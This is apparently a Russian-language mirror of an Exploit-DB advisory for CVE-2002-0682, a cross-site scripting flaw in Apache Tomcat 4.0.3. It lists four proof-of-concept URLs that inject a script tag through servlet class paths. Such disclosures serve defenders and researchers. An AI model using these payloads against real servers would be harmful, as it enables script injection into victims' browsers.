- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21604
- Проверка EDB
-
- Пройдено
- Автор
- MATT MOORE
- Тип уязвимости
- REMOTE
- Платформа
- LINUX
- CVE
- cve-2002-0682
- Дата публикации
- 2002-07-10
Код:
source: https://www.securityfocus.com/bid/5193/info
A vulnerability has been reported for Apache Tomcat 4.0.3 on Microsoft Windows and Linux platforms. Reportedly, it is possible for an attacker to launch a cross site scripting attack.
When servlet mapping is enabled, it is possible to invoke various servlets and classes and cause Apache Tomcat to throw an exception. This will make cross site scripting attacks possible.
tomcat-server/servlet/org.apache.catalina.servlets.WebdavStatus/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.ContainerServlet/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Context/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Globals/<SCRIPT>alert(document.domain)</SCRIPT>- Источник
- www.exploit-db.com
